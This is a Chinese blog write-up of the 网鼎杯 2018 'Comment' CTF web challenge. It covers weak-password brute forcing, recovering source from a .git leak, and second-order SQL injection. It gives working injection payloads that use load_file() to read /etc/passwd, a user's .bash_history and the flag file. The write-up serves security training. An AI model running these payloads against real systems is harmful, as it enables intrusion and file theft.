[网鼎杯 2018]Comment wp思路详细

最新推荐文章于 2024-10-31 23:02:39 发布
最新推荐文章于 2024-10-31 23:02:39 发布
阅读量142 收藏
点赞数
分类专栏: CTF-web 文章标签: sql web安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73560599/article/details/132766560
版权

打开页面信息不多 点击发帖 

跳转到登录页面 

这里进行爆破 账号密码已经给了提示 zhangwei zhangwei***

***肯定是数字 不然排列组合过大

爆破出 密码为zhangwei666

登录就可以发帖了 但是这里正常的一些方法都不行

没思路的时候可以扫目录看看  但是这里控制台有个提示 也是后来我才发现的

这里就知道.git泄露了 

但是如果没看到提示时可以使用ctf-wscan进行扫目录  注意python版本 python3的版本

ctf-wscan github上有 大家自己搜索即可 

可以扫出.git泄露  这些脚本大家自行搜索即可 这题的源码也会放在后面

.git泄露基本都使用脚本很少手工  git恢复源码 进行代码审计

注意 使用两个脚本时的py版本

这里恢复出的代码给到大家

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

进行代码审计

重要的部分如下

这里注意转义符的概念 

我们注册一个用户名为admin’#  虽然服务端做了转义为admin\’#  但是 数据库中的用户名还是admin’#   不会是admin\’#  如果是后者 admin‘# 这个用户将永远登不成功了 所以从数据库拿出的时候还是我们输入的值 这样就构造出了下面我们需要打入的payload

我们将sql语句单独拎出分析  构造exp

既然是注入 那么精髓就是闭合

由于sql语句为换行 #注释也只能注释当前行 所以使用/**/进行换行拼接注释  category和comment为我们进行控制的点 在这两点上进行输入payload

方框中的代码就是我们需要注入的 达到闭合 

接下来开始

在发表处输入',content = database(),/*    展示数据库 再进入留言板处输入 */-- - 进行闭合 将database带出

成功出现数据库

后面就按照这样 发表处输入exp  然后进入留言板输入exp进行闭合 达到注入 # -- -都可

读取etc/passwd 查看用户信息  这里需要些脑洞 不然的确不知道该看什么信息

主要是思路的拓宽

',content=(select( load_file('/etc/passwd'))),/*   读取etc/passwd

 发现存在www用户   对其进行查看分析 查看history命令

',content=(select( load_file('/home/www/.bash_history'))),/*    查看历史命令

可以查看页面源代码查看 更清晰

分析历史命令得知 在/tmp/html下有个.DS_Store文件

',content=(select hex(load_file('/tmp/html/.DS_Store'))),/*   读取文件

进行hex解码 得到一个文件  flag_8946e1ff1ee3e40f.php  这里解码出来有点乱 大家仔细看

使用hex编码可以避开一些问题

对其进行读取即可 所以最终payload如下

',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*

layz_y
关注
专栏目录
[网络安全自学篇] 八十一.WHUCTF之WEB类解题思路WP(文件上传漏洞、冰蝎蚁剑、反序列化phar)
杨秀璋的专栏
05-30 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF部分题目,包括代码审计、文件包含、过滤绕过、SQL注入。这篇文章将讲解Easy_unserialize解题思路详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。第一次参加CTF,还是学到了很多东西,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
【云原生】docker 部署 Doris 数据库使用详解
热门推荐
congge
09-08 1万+
docker 部署 Doris 数据库使用详解
2018网鼎杯Give_a_try WP
一位非著名不专业的Re选手
06-05 848
0x0 记录一次某Crackme的分析过程,大致分为算法和反调试两部分。 0x1 [测试环境]win10 64 [使用工具]Ollydbg丶IDA 0x2 算法部分 应该是将反调试部分写在前面的,但是由于这个CM的算法部分相对与反调试部分的意义较小,所以先写在前面,重点写在后面。以下都是在过了反调试的情况下的分析。 将程序拖入IDA后 shift+F12打开字符串窗口 ​ 可以看到作者给我们的提示 pizza:0040210A 0000001D C The flag begins with “fla
2020网鼎杯wp
qq_40648358的博客
05-11 4451
2020网鼎杯wp_XJUSECMISC签到WEBfilejavaAreUSerialznotesCRYPTOboomyou raise me upPWNboom1REsignaljockerbang MISC 签到 点进去是选战队图标 全部通过后会让输入token 然后能在console看到flag WEB filejava 打开题目,查看基本的功能后发现有一个文件下载功能,尝试穿越目录发现web.xml 再次寻找这几个servlet的字节码在classes/cn/abc/servle
[网鼎杯 2018]Comment
weixin_43940853的博客
03-26 4434
首先爆破弱密码登录,是一个类似留言板的界面,考虑二次注入 git源码泄露 这里要恢复一下文件,否则文件内容显示不全 //write_do.php <?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ header("Location: ./login.php"); die(...
[网鼎杯 2018]Fakebook -wp
freerats的博客
06-27 419
打开容器,发现页面里有注册页面和登入页面 任意注册一个用户名,进行登入 在blog处发现有xss,一开始研究了半天,然后卡住了,参考别人的wp才发现这道题跟xss没有半毛钱关系。。。 view.php?no=1 在这里是有注入点的 加个引号报错还会爆出绝对路径 发现union被过滤,但/**/union/**/可以绕过 列名 然后查看一下字段 查询到data发现这里面是以序列化的形式储存的 这道题的最关键还是是通过目录扫描发现有robots.txt,进而发现/user.php.bak 其实还可以跑出有f.
网鼎杯 隐写WP
ZKCQM23的博客
08-21 1909
别人告诉了怎么做,原理不怎么明白。怎么操作都查了半天。。。贴出来分享一下。 图片打开后是这样的,用Stegsolve打开,以前只会打开点点点,也不知道是什么意思        这边左右点转换的是颜色通道,alpha,RGB(red,green,blue)。具体是什么也不明白。。。(这只是一个说操作的WP 把A0和G0通道保存(file-&gt;save as,随便换个文件名和图...
网鼎杯2020朱雀组-web
ChenZIDu的博客
05-18 3081
nmap那题就基本命令然后还有一个别的方法。 nmap 源码 index.php <? require('settings.php'); set_time_limit(0); if (isset($_POST['host'])): if (!defined('WEB_SCANS')) { die('Web scans disabled'); } $host = $_POST['host']; if(stripos($host,'php')!==false){ di
2018西安工业大学第二届萌新线上赛web WP
极光时流
10-03 4370
赛题网站:http://117.34.116.134/ WBE 榕榕学姐的美好祝愿 打开链接 右击,查看页面源码 得到flag web1 打开,发现  右击,查看源码,在最下面发现flag web2 打开,查看源码,没有发现有用信息 按F12,查看网络,发现Cookie里藏着flag   web3 打开,发现是代码审计题 审计PHP代码,就是要...
[Python从零到壹] 五.网络爬虫之BeautifulSoup基础语法万字详解
杨秀璋的专栏
11-08 1万+
欢迎大家来到“Python从零到壹”,在这里我将分享约200篇Python系列文章,带大家一起去学习和玩耍,看看Python这个有趣的世界。所有文章都将结合案例、代码和作者的经验讲解,真心想把自己近十年的编程经验分享给大家,希望对您有所帮助,文章中不足之处也请海涵。Python系列整体框架包括基础语法10篇、网络爬虫30篇、可视化分析10篇、机器学习20篇、大数据分析20篇、图像识别30篇、人工智能40篇、Python安全20篇、其他技巧10篇。您的关注、点赞和转发就是对秀璋最大的支持,知识无价人有情,希望
网鼎杯-青龙组-Web-Wp
XunanSec的博客
05-26 1530
0x01 开局一张图 一看就知道让我们代码审计 对于这种一长串的源码,还是逐步来解把 首先的解题思路就是查看CTF题目的命名和代码函数 CTF题目这里命名为AreUSerialz,我反正一眼看不出什么端详,打的CTF比较少,直接看函数名字 在下面可以看到有一个unserialize()函数,那这一题基本上就是考反序列化的知识了。 我们整体的浏览一边代码,来看一下程序的大概走向。 <?php include("flag.php"); highlight_file(__FILE__); cl
网鼎杯第一场wp
weixin_30482181的博客
08-21 407
网鼎杯第一场WriteUP—-china H.L.B 团队 文章地址:https://www.o2oxy.cn/1661.html 1、签到题 回复1f5f2e进入下一关 2、Clip 下载题目是Disk 文件。第一反应是linux虚拟硬盘。 用winhex 打开如图: 在winhex中第196280 发现了png的头文件如图: ...
网鼎杯misc部分题的wp
weixin_44906357的博客
06-09 1239
网鼎杯misc部分题的题解 自己的ctf算是零基础,进来公司安排的任务是收集整理近期ctf题目,我想着那就正好当作联系吧,于是随便自己写一下wp加深一下印象 1.hidden 上来先整一道简单的吧。 下面上wp 01 对压缩包进行解压,首先看到的是一张图片。然后开始常规的图片隐写题的套路。试了一波发现没找到flag。然后使用binwalk -e对图片进行分离,看到里面有一个压缩包 02 压缩包有密码,又看了一圈没发现什么提示,也有可能是没找到吧,然后尝试弱密码破解,最后试出来密码是1235 03 解压出来后
网鼎杯第三场wp
weixin_30477293的博客
08-27 1019
晚上十点更新 十点:https://www.o2oxy.cn/1753.html 转载于:https://www.cnblogs.com/liang2580/p/9543706.html
2024网鼎杯初赛-青龙组-WP
最新发布
m0_52484587的博客
10-31 363
GitHub - CTF-Archives/2024-wdb-qinglong: 第四届 “网鼎杯” 网络安全大赛 青龙组 初赛
2022网鼎杯青龙组wp
fly1ng_pengu1n的博客
08-27 3497
2022网鼎杯青龙组wp
[网鼎杯 2020 朱雀组]phpweb wp
m0_55185160的博客
03-25 742
打开题目,又被这个图片给雷到,看那个报错也没有看出个啥来,然后用dirsearch扫了一遍也没有什么发现,看着一直在闪于是便用bp抓了个包。 发现最下面有两个参数,看到报错里面的data有关。之后查看了源代码 这里是5000秒传递一次表单,post方式传递两个参数一个为func,一个为p date是一个返回代表特定日期的序列号的函数, 而p中的参数也正好像是date函数中的参数的格式,于是我们可以假设func里的是参数而p中的是函数里面的参数,于是我们将func=md5p=123看一下 看到..
人人网安卓开发API全览
"人人网安卓开发API提供了丰富的接口,涵盖了用户信息、相册、好友关系等多个方面的功能,方便开发者在Android平台上与人人网进行深度集成。以下是对这些接口的详细说明: 1. 用户信息接口: - `users.getInfo`:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

layz_y

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值